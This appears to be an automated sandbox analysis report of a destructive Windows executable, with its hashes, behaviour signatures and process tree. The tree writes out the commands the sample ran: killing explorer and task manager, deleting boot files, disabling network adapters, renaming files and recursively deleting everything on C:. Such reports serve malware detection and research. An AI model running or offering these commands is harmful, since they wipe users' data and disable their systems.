Analysis

  • max time kernel
    90s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-01-2023 12:35

General

  • Target

    ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe

  • Size

    537KB

  • MD5

    99ae89d49036c0e2f934339510c68bea

  • SHA1

    b05fe3112ff3b29aca6b510cb093094ad10011d4

  • SHA256

    ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061

  • SHA512

    7a6c48ab4a1894a6712bc337d356f984a38e18f4005bd259a016f9bf634eff92f349f61f49aa0990d579bb50c423930700a6a2874371160f8664cc56a35580a7

  • SSDEEP

    6144:4gWnATR10e5cDOT4cFxWdkGjZJi8mImDGHGaLtKXuRth1M+H:Cq10/DOT4ce3j7DDKXuRthG+

Score
6/10

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Kills process with taskkill 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe
    "C:\Users\Admin\AppData\Local\Temp\ef9e517a597bb154f045d58dd7dda00e421c69154777b79b89b9659c5b7e8061.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4912
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill -f -im 'explorer.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4776
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im 'explorer.exe'
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill -f -im 'cmd.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:608
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im 'cmd.exe'
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4256
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill -f -im 'powershell.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im 'powershell.exe'
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4968
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill -f -im 'powershell_ise.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4360
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im 'powershell_ise.exe'
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill -f -im 'studentmain.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im 'studentmain.exe'
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2648
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill -f -im 'taskmgr.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill -f -im 'taskmgr.exe'
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4624
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib -S -H C:\bootmgr
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\SysWOW64\attrib.exe
        attrib -S -H C:\bootmgr
        3⤵
        • Views/modifies file attributes
        PID:4996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib -S -H C:\boot.ini
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\SysWOW64\attrib.exe
        attrib -S -H C:\boot.ini
        3⤵
        • Views/modifies file attributes
        PID:1444
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib -S -H C:\ntldr
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Windows\SysWOW64\attrib.exe
        attrib -S -H C:\ntldr
        3⤵
        • Views/modifies file attributes
        PID:2372
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib -S -H C:\Autoexec.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\SysWOW64\attrib.exe
        attrib -S -H C:\Autoexec.bat
        3⤵
        • Views/modifies file attributes
        PID:4512
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c del -f -s -q C:\Autoexec.bat
      2⤵
        PID:4804
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c del -f -s -q C:\windows\win.ini
        2⤵
          PID:4260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c del -f -s -q C:\windows\system.ini
          2⤵
            PID:4332
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c attrib -S -H C:\config.sys
            2⤵
              PID:3080
              • C:\Windows\SysWOW64\attrib.exe
                attrib -S -H C:\config.sys
                3⤵
                • Views/modifies file attributes
                PID:4272
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c del -f -s -q C:\config.sys
              2⤵
                PID:3852
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c del -f -s -q C:\ntldr
                2⤵
                  PID:3528
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c del -f -s -q C:\boot.ini
                  2⤵
                    PID:3576
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c del -f -s -q C:\bootmgr
                    2⤵
                      PID:3356
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c netsh interface set interface '±¾µØÁ¬½Ó' disabled
                      2⤵
                        PID:5008
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh interface set interface '±¾µØÁ¬½Ó' disabled
                          3⤵
                            PID:3568
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c netsh interface set interface 'WLAN' disabled
                          2⤵
                            PID:2072
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh interface set interface 'WLAN' disabled
                              3⤵
                                PID:4668
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ren C:\*.* *.taierzhuang
                              2⤵
                                PID:1204
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c del -f -s -q C:\*.*
                                2⤵
                                  PID:3788

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/4912-132-0x0000000000140000-0x00000000001FD000-memory.dmp

                                Filesize

                                756KB

                              • memory/4912-168-0x0000000000140000-0x00000000001FD000-memory.dmp

                                Filesize

                                756KB